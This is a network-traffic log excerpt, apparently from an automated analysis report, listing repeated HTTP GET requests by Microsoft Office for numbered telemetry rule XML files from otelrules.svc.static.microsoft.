Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
